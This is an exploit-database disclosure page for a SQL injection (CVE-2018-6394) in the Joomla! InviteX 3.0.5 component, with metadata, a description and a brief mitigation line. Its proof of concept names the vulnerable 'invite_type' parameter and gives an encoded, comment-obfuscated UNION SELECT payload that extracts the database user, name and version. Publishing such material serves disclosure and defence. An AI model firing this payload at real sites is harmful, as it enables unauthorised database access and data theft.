header-logo
Suggest Exploit
vendor:
InviteX
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: InviteX
Affected Version From: 3.0.5
Affected Version To: 3.0.5
Patch Exists: YES
Related CWE: CVE-2018-6394
CPE: a:techjoomla:invitex:3.0.5
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component InviteX 3.0.5 – SQL Injection

Joomla! Component InviteX 3.0.5 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands on the underlying database, potentially allowing for the retrieval of sensitive data from the database.

Mitigation:

Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component InviteX 3.0.5 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://techjoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/content-sharing/bookmark-a-recommend/invitex/
# Version: 3.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6394
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_invitex&view=invites&invite_type=[SQL]&invite_anywhere=1
#  
# JTJkJTM4JTM3JTM3JTM4JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTMxJTJjJTMyJTJjJTMzJTJjJTM0JTJjJTM1JTJjJTM2JTJjJTM3JTJjJTM4JTJjJTM5JTJjJTMxJTMwJTJjJTMxJTMxJTJjJTMxJTMyJTJjJTMxJTMzJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTMxJTM1JTJjJTMxJTM2JTJjJTMxJTM3JTJjJTMxJTM4JTJjJTMxJTM5JTJkJTJkJTIwJTJk
#  
# # # #